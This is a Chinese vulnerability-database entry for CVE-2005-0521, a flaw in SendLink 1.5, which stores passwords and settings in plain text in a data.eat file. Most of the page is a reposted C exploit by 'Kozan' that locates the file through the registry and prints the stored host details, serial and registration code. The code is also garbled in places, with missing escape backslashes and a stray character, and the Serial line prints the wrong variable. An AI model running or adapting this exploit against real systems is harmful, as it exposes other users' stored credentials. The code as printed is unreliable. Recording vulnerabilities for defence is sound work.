SendLink data.eat文件敏感信息泄露漏洞
| 漏洞ID | 1108474 | 漏洞类型 | 未知 |
| 发布时间 | 2005-02-22 | 更新时间 | 2005-10-20 |
![图片[1]-SendLink data.eat文件敏感信息泄露漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2005-0521 |
![图片[2]-SendLink data.eat文件敏感信息泄露漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200502-088 |
| 漏洞平台 | Windows | CVSS评分 | 2.1 |
|漏洞来源
|漏洞详情
SendLink是一款小巧便捷的网络共享软件。SendLink1.5将可能包含密码在内的敏感信息以纯文本格式存储在data.eat文件中,这可让本地用户获取特权。
|漏洞EXP
/*****************************************************************
SendLink v1.5 Local Exploit by Kozan
Application: SendLink v1.5
Vendor:Computer Knacks
http://www.computerknacks.com/
Vulnerable Description: SendLink v1.5 discloses passwords to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <windows.h>
#include <stdio.h>
#include <string.h>
#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
char *hostip, *hostname, *serial, *options, *regcode, *hostport;
int adresal(char *FilePath,char *Str)
{
char kr;
int Sayac=0;
int Offset=-1;
FILE *di;
di=fopen(FilePath,"rb");
if( di == NULL )
{
fclose(di);
return -1;
}
while(!feof(di))
{
Sayac++;
for(int i=0;i<strlen(Str);i++)
{
kr=getc(di);
if(kr != Str[i])
{
if( i>0 )
{
fseek(di,Sayac+1,SEEK_SET);
}
break;
}
if( i > ( strlen(Str)-2 ) )
{
Offset = ftell(di)-strlen(Str);
fclose(di);
return Offset;
}
}
}
fclose(di);
return -1;
}
char *oku(char *FilePath,char *Str)
{
FILE *di;
char cr;
char BB = 0xBB;
int i=0;
char Feature[500];
int Offset = adresal(FilePath,Str);
if( Offset == -1 )
return "";
if( (di=fopen(FilePath,"rb")) == NULL )
return "";
fseek(di,Offset+strlen(Str),SEEK_SET);
while(!feof(di))
{
cr=getc(di);
if(cr == BB)
break;
Feature[i] = cr;
i++;
}
Feature[i] = '�';
fclose(di);
return Feature;
}
int main(void)
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE)
prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!n");
return 0;
}
RegCloseKey(hKey);
}
else
{
RegCloseKey(hKey);
printf("An error occured!n");
return 0;
}
strcat(prgfiles,"\SendLink\User\data.eat");
printf("SendLink v1.5 Local Exploit by Kozann");
printf("Credits to ATmaCAn");
printf("www.netmagister.com - www.spyinstructors.com nn");
try
{
char hostip_temp[BUFSIZE];
wsprintf(hostip_temp,"hostip%c=%c",0xBB,0xAB);
hostip=oku(prgfiles,hostip_temp);
printf("Host IP: %sn",hostip);
char hostname_temp[BUFSIZE];
wsprintf(hostname_temp,"hostname%c=%c",0xBB,0xAB);
hostname=oku(prgfiles,hostname_temp);
printf("Hostname : %sn",hostname);
char hostport_temp[BUFSIZE];
wsprintf(hostport_temp,"hostport%c=%c",0xBB,0xAB);
hostport=oku(prgfiles,hostport_temp);
printf("Host Port : %sn",hostport);
char options_temp[BUFSIZE];
wsprintf(options_temp,"options%c=%c",0xBB,0xAB);
options=oku(prgfiles,options_temp);
printf("Options : %sn",options);
char serial_temp[BUFSIZE];
wsprintf(serial_temp,"serial%c=%c",0xBB,0xAB);
serial=oku(prgfiles,serial_temp);
printf("Serial : %sn",hostip);
char regcode_temp[BUFSIZE];
wsprintf(regcode_temp,"regcode%c=%c",0xBB,0xAB);
regcode=oku(prgfiles,regcode_temp);
printf("Registration Code : %sn",regcode);
}catch(...){ printf("An error occured!n"); return 0; }
return 0;
}
// milw0rm.com [2005-02-22]
|参考资料
来源:SECTRACK
名称:1013269
链接:http://securitytracker.com/id?1013269
相关推荐: Cooolsoft PowerFTP Server漏洞
Cooolsoft PowerFTP Server漏洞 漏洞ID 1205086 漏洞类型 未知 发布时间 2001-11-28 更新时间 2001-11-28 CVE编号 CVE-2001-0933 CNNVD-ID CNNVD-200111-052 漏洞平…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666